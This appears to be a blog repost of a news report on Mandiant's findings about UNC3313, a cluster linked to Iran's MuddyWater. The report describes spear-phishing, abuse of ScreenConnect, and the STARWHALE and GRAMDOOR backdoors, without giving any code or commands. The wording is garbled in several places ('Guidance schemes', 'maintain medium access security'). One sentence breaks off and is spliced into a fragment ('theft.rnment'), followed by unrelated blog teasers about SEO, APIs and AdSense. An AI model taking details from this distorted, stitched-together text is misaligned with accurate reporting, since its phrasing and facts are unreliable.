In November 2021, a threat actor in the Iranian geopolitical network was discovered to have deployed two new targeted malware with “simple” backdoor functionality as part of an incursion into an unnamed government body in the Middle East.
Cybersecurity firm Mandiant attributed the attack to an uncategorized cluster it tracks as UNC3313, which it rates with “moderate certainty” associated with state-sponsored group MuddyWater.
“UNC3313 monitors and collects strategic information to support Iranian interests and decision-making,” said researchers Ryan Tomczyk, Emiel Hegebarth and Tufail Ahmed. “Guidance schemes and their associated decoys show a strong focus on targets with a geopolitical connection.”
In mid-January 2022, MuddyWater (aka Static Kitten, Seedworm, TEMP.Zagros or Mercury) was characterized by U.S. intelligence agencies as a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS) that has been active since at least 2018 and is known to use a wide range of tools and methods in their activities.
The attacks were allegedly orchestrated using spear-phishing messages to gain initial access, followed by the use of offensive security tools and publicly available remote access software to move sideways and maintain medium access security.
The phishing emails were created for promotion and tricked several victims into clicking a URL to download a RAR archive file hosted on OneHub, paving the way for installing ScreenConnect, a legitimate remote access software, to gain a foothold.
“UNC3313 quickly established remote access using ScreenConnect to infiltrate systems within an hour of the initial compromise,” the researchers noted, adding that the security incident was quickly contained and resolved.
Subsequent stages of the attack included privilege escalation, performing internal reconnaissance on the target network, and executing obfuscated PowerShell commands to download additional tools and payloads to remote systems.
A previously undocumented backdoor called STARWHALE, a Windows script file (.WSF) that executes commands received from a hard-coded command and control (C2) server via HTTP, was also discovered.
The other implant delivered in the attack is GRAMDOOR, so named because it uses the Telegram API to communicate its network with an attacker-controlled server in an attempt to avoid detection, further emphasizing the use of communication tools to facilitate data theft.rnment, the oil and gas sector and telecommunications around the world.
-
5 best practices for your site’s SEO – Seo guide for beginner
Previous Post Next Post Coming Soon… 5 best practices for your site’s SEO As you would expect, the large majority of users never go beyond the first few results. According to Hubspot, 75% of users go no further than the first page of search results. It’s essential, then, that your website ranks in the top… Read More »5 best practices for your site’s SEO – Seo guide for beginner
-
What is an API? Application Programming Interface
Previous Post Next Post You’ve probably heard of an “ API ” maybe from your friends who work in tech, but are you still unsure of what that means? This article is for you! Today, we’ll be explaining what an API is and what it’s used for since, really, it’s brilliant. Why use an API?… Read More »What is an API? Application Programming Interface
-
How to Get Google AdSense Approval (Best Guide)
Previous Post Next Post I first applied to AdSense 7 years ago. And since then, I’ve helped many people get approved for displaying Google Ads to make money. In this ultimate guide on DXT BLOG, you’ll learn how to get Google AdSense approval fast. Google AdSense is the most popular ad network for bloggers and… Read More »How to Get Google AdSense Approval (Best Guide)
